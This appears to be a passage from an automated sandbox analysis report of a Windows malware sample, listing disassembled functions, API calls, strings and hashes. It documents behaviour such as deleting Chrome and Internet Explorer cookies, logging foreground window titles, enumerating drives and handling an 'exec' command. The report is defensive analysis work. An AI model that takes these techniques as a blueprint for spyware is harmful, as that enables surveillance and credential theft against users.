                              • Instruction Fuzzy Hash: D6218E72900109ABC700ABA19D8EEFF777DDB84705F10406AF506A2191DAF85E85CBAD
                              Function 00405D53 Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 91COMMON
                              Download Yara Rule
                              APIs
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000), ref: 00405D64
                                • Part of subcall function 00408EF1: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,80000002), ref: 00408F12
                                • Part of subcall function 00408EF1: RegQueryValueExA.ADVAPI32(80000002,004075CB,00000000,00000000,?,00000400), ref: 00408F31
                                • Part of subcall function 00408EF1: RegCloseKey.ADVAPI32(80000002), ref: 00408F3A
                                • Part of subcall function 00408EF1: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00410668,?), ref: 00408F59
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00405D8B
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405D94
                              • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00410668), ref: 00405DA3
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00000104), ref: 00405DD0
                              • ExpandEnvironmentStringsA.KERNEL32(00000000), ref: 00405DD7
                              • PathFileExistsA.SHLWAPI(?), ref: 00405DE4
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([IE cookies cleared!],?), ref: 00405E1A
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405E67
                                • Part of subcall function 0040F234: FindFirstFileA.KERNEL32(?,?,00415918,00410668,76F93520), ref: 0040F2F5
                              • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP60(00410CC4,00000000), ref: 00405E38
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([IE cookies cleared!],?), ref: 00405E54
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@D@1@@$??1?$basic_string@File$??4?$basic_string@??8std@@?c_str@?$basic_string@?find@?$basic_string@CloseD@2@@0@EnvironmentExistsExpandFindFirstOpenPathQueryStringsV01@V01@@V?$basic_string@Value
                              • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                              • API String ID: 1627278905-4073444585
                              • Opcode ID: 2694f6698a7aa59175af7fd993aba418089cd61275ab9121a9622683bf210f80
                              • Instruction ID: ce9239a2887a28e7c3d3296c59a61411ed8d7c47a0aa921717fce0c83e46222a
                              • Opcode Fuzzy Hash: 2694f6698a7aa59175af7fd993aba418089cd61275ab9121a9622683bf210f80
                              • Instruction Fuzzy Hash: 17318471640109ABDB04EBA4DD5EAEF777CDB44314F504067E501B21D0EEB89A88CFAA
                              Function 004056EC Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 68fileCOMMON
                              Download Yara Rule
                              APIs
                              • getenv.MSVCRT ref: 00405701
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 0040570C
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00405717
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405722
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040572B
                              • DeleteFileA.KERNEL32(00000000), ref: 00405732
                              • GetLastError.KERNEL32 ref: 0040573C
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Chrome Cookies not found],?,?,?,?,00000000), ref: 0040575D
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000), ref: 00405770
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Chrome Cookies found, cleared!],?,?,?,?,00000000), ref: 00405796
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000), ref: 004057AB
                              Strings
                              • [Chrome Cookies not found], xrefs: 00405758
                              • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 004056F6
                              • UserProfile, xrefs: 004056FC
                              • [Chrome Cookies found, cleared!], xrefs: 00405791
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@??1?$basic_string@D@1@@$?c_str@?$basic_string@D@2@@0@DeleteErrorFileHstd@@LastV10@V?$basic_string@getenv
                              • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                              • API String ID: 3740952235-304995407
                              • Opcode ID: 51d6901ca4da6e011993bb39d6d9175aba19df33fb05b91d090322444a48c6c4
                              • Instruction ID: 8dcf24351441a3668afb3d619d1a527b51a24c68bcaca8363eb68d31d9c31fe8
                              • Opcode Fuzzy Hash: 51d6901ca4da6e011993bb39d6d9175aba19df33fb05b91d090322444a48c6c4
                              • Instruction Fuzzy Hash: 9C118131640509AFD700ABE4DD4EAFE7778EB50305F504077E402E31D0EEB95A88CBAA
                              Function 0040F4A3 Relevance: 25.6, APIs: 17, Instructions: 110COMMON
                              Download Yara Rule
                              APIs
                              • GetForegroundWindow.USER32(76F90F00,00415940,?,?,?,?,?,?,?,?,0040E240), ref: 0040F4AB
                              • GetWindowTextLengthA.USER32(00000000), ref: 0040F4B4
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000001,00000000,?,?,?,?,?,?,?,?,?,0040E240), ref: 0040F4CD
                              • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,0040E240), ref: 0040F4D6
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040E240), ref: 0040F4E0
                              • GetWindowTextA.USER32(00000000,00000000), ref: 0040F4E8
                              • ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(?,?,?,?,?,?,?,?,0040E240), ref: 0040F4F7
                              • ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040E240), ref: 0040F501
                              • ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040E240), ref: 0040F50B
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(004108AC,?,00000000,?,?,?,?,?,?,?,?,0040E240), ref: 0040F522
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040E240), ref: 0040F531
                                • Part of subcall function 0040EFB5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040EFC4
                                • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040EFDB
                                • Part of subcall function 0040EFB5: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491), ref: 0040EFF1
                                • Part of subcall function 0040EFB5: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 0040F00F
                                • Part of subcall function 0040EFB5: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F019
                                • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F022
                                • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F037
                                • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F044
                                • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F096
                                • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F09F
                                • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F0A8
                              • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(00000000,00000000,00000000), ref: 0040F562
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F58D
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040E240), ref: 0040F596
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040F5AB
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F5DC
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F5E5
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$??0?$basic_string@?length@?$basic_string@$D@1@@V12@Window$?begin@?$basic_string@?c_str@?$basic_string@?find@?$basic_string@TextV01@@$??4?$basic_string@?end@?$basic_string@?substr@?$basic_string@ForegroundLengthV01@
                              • String ID:
                              • API String ID: 3496238640-0
                              • Opcode ID: d78fe6c2566b637451fcc8495cb98b3847fa1ecb3c1eee7ec14cfc758dd3ef6a
                              • Instruction ID: 154c6d577414d328a897fa1d3e202a68548f2e644e003aaa846313a3066079b3
                              • Opcode Fuzzy Hash: d78fe6c2566b637451fcc8495cb98b3847fa1ecb3c1eee7ec14cfc758dd3ef6a
                              • Instruction Fuzzy Hash: E6412E31500009ABCB14EBA5DD5A9FE7BB8EB54305B504179F807B21E0EFB45E89CAA9
                              Function 00403988 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 85sleepCOMMON
                              Download Yara Rule
                              APIs
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 004039D1
                                • Part of subcall function 0040F4A3: GetForegroundWindow.USER32(76F90F00,00415940,?,?,?,?,?,?,?,?,0040E240), ref: 0040F4AB
                                • Part of subcall function 0040F4A3: GetWindowTextLengthA.USER32(00000000), ref: 0040F4B4
                                • Part of subcall function 0040F4A3: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000001,00000000,?,?,?,?,?,?,?,?,?,0040E240), ref: 0040F4CD
                                • Part of subcall function 0040F4A3: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,0040E240), ref: 0040F4D6
                                • Part of subcall function 0040F4A3: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040E240), ref: 0040F4E0
                                • Part of subcall function 0040F4A3: GetWindowTextA.USER32(00000000,00000000), ref: 0040F4E8
                                • Part of subcall function 0040F4A3: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(?,?,?,?,?,?,?,?,0040E240), ref: 0040F4F7
                                • Part of subcall function 0040F4A3: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040E240), ref: 0040F501
                                • Part of subcall function 0040F4A3: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040E240), ref: 0040F50B
                                • Part of subcall function 0040F4A3: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(004108AC,?,00000000,?,?,?,?,?,?,?,?,0040E240), ref: 0040F522
                                • Part of subcall function 0040F4A3: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040E240), ref: 0040F531
                                • Part of subcall function 0040F4A3: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(00000000,00000000,00000000), ref: 0040F562
                                • Part of subcall function 0040F4A3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F58D
                                • Part of subcall function 0040F4A3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040E240), ref: 0040F596
                              • Sleep.KERNEL32(000003E8), ref: 004039E8
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?, ]), ref: 004039FF
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[ ,00000000), ref: 00403A0F
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00403A1C
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00403A2B
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403A34
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403A3D
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403A46
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00403A55
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 00403A73
                              • Sleep.KERNEL32(000003E8), ref: 00403A8A
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@$??1?$basic_string@V01@@$D@1@@Window$?begin@?$basic_string@D@2@@0@Hstd@@SleepTextV?$basic_string@$??4?$basic_string@?c_str@?$basic_string@?end@?$basic_string@?find@?$basic_string@?length@?$basic_string@ForegroundLengthV01@V10@V10@@V12@
                              • String ID: [ $ ]
                              • API String ID: 1155922707-93608704
                              • Opcode ID: 028624cf86794867e41c357077a072d6be74b9f20b38747f7632aa35c991c93f
                              • Instruction ID: 47295d00c881f16adcdb252269db0bc951bee967cd76f0c472b369b741ed2101
                              • Opcode Fuzzy Hash: 028624cf86794867e41c357077a072d6be74b9f20b38747f7632aa35c991c93f
                              • Instruction Fuzzy Hash: 31219BB1A00109ABDB40BB75DC5AAEF7F7CAB44304F0045BAF506B31D2DE785A498B9D
                              Function 004083E6 Relevance: 24.1, APIs: 16, Instructions: 67stringCOMMON
                              Download Yara Rule
                              APIs
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,6A41AFB0), ref: 004083F4
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040BF72), ref: 004083FD
                              • GetDriveTypeA.KERNEL32(00000000,?,0000000A), ref: 00408415
                              • _itoa.MSVCRT ref: 0040841C
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,0000002D), ref: 00408432
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040843A
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,00000000), ref: 00408449
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000), ref: 00408456
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408462
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040846B
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00408474
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040847D
                              • lstrlenA.KERNEL32(00000000), ref: 00408484
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040849A
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040BF72), ref: 004084A3
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040BF72), ref: 004084AC
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@1@@D@2@@0@Hstd@@V01@@V10@V?$basic_string@$??4?$basic_string@?c_str@?$basic_string@?data@?$basic_string@DriveTypeV01@_itoalstrlen
                              • String ID:
                              • API String ID: 3966177967-0
                              • Opcode ID: 35d56568f8730d340fd7fa84469ab2b745bf81bdac80b614cf61c9766c113363
                              • Instruction ID: f6cd9da774f90e216c8850a182eab4fb86b9b379ce6a16f8b7c54746bda286dd
                              • Opcode Fuzzy Hash: 35d56568f8730d340fd7fa84469ab2b745bf81bdac80b614cf61c9766c113363
                              • Instruction Fuzzy Hash: 25219A7190010EABCB14DBA0ED4D9DE7BB8EF54305B104475E506A2190EF74AF49CB59
                              Function 0040F9EF Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 71windowCOMMON
                              Download Yara Rule
                              APIs
                              • DefWindowProcA.USER32(?,00000401,?,?), ref: 0040FA1C
                              • GetCursorPos.USER32(?), ref: 0040FA47
                              • SetForegroundWindow.USER32(?), ref: 0040FA50
                              • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0040FA6B
                              • Shell_NotifyIconA.SHELL32(00000002,00415BB0), ref: 0040FABC
                              • ExitProcess.KERNEL32 ref: 0040FAC4
                              • CreatePopupMenu.USER32 ref: 0040FACC
                              • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0040FAE1
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                              • String ID: Close
                              • API String ID: 1657328048-3535843008
                              • Opcode ID: d6ed23cd633fae06e75435f563c32a18db35a532ce573e8f95f6d74bc3567ba5
                              • Instruction ID: 8e1ada1201d2f43d84cd2c70e63543890078da6759be781d4fcfc1fc91c4ebbf
                              • Opcode Fuzzy Hash: d6ed23cd633fae06e75435f563c32a18db35a532ce573e8f95f6d74bc3567ba5
                              • Instruction Fuzzy Hash: BC21DA31244209EFDF259FA4ED49BDA3B75AB44701F508031F609A45F0C7B59964EF1D
                              Function 0040D3A5 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 66COMMON
                              Download Yara Rule
                              APIs
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040D3B6
                              • SetEvent.KERNEL32(?), ref: 0040D3BF
                              • CloseHandle.KERNEL32(?), ref: 0040D3C8
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00415268), ref: 0040D3D8
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040D3E7
                                • Part of subcall function 0040EFB5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040EFC4
                                • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040EFDB
                                • Part of subcall function 0040EFB5: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491), ref: 0040EFF1
                                • Part of subcall function 0040EFB5: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 0040F00F
                                • Part of subcall function 0040EFB5: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F019
                                • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F022
                                • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F037
                                • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F044
                                • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F096
                                • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F09F
                                • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F0A8
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000,00000000), ref: 0040D407
                              • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,exec), ref: 0040D416
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040D432
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040D448
                                • Part of subcall function 0040D20D: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(004108CC,?,?,?,?), ref: 0040D228
                                • Part of subcall function 0040D20D: getenv.MSVCRT ref: 0040D234
                                • Part of subcall function 0040D20D: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000,?), ref: 0040D240
                                • Part of subcall function 0040D20D: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040D24D
                                • Part of subcall function 0040D20D: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D258
                                • Part of subcall function 0040D20D: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D261
                                • Part of subcall function 0040D20D: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000001), ref: 0040D26E
                                • Part of subcall function 0040D20D: ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00000000), ref: 0040D27B
                                • Part of subcall function 0040D20D: ?is_open@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QBE_NXZ.MSVCP60 ref: 0040D287
                                • Part of subcall function 0040D20D: ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(?,?), ref: 0040D2A0
